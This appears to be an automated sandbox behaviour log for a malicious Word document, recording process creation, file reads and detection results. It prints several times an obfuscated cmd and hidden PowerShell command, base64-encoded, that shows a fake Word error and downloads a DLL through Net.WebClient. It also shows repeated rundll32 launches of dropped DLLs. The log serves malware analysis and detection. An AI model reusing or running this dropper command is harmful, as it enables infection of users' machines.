                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....x.................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....Hc...............A.............}..v....H.......0.l.....................r.......H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;....... ..........j.....Hc...............A.............}..v............0.l.............8Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................A.............}..v....H.......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................A.............}..v....x.......0.l...............c.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................A.............}..v............0.l...............c.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: Informacion_4-09757.docMetadefender: Detection: 36%
                    Source: Informacion_4-09757.docReversingLabs: Detection: 75%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
                    Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
                    Source: Informacion_4-09757.docInitial sample: OLE summary subject = withdrawal yellow Australia Credit Card Account Alabama connecting Jamaican Dollar Configuration Wooden Extension copy Marshall Islands ivory Rubber

                    Data Obfuscation:

                    barindex
                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                    Source: Informacion_4-09757.docStream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
                    Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76
                    PowerShell case anomaly foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAaw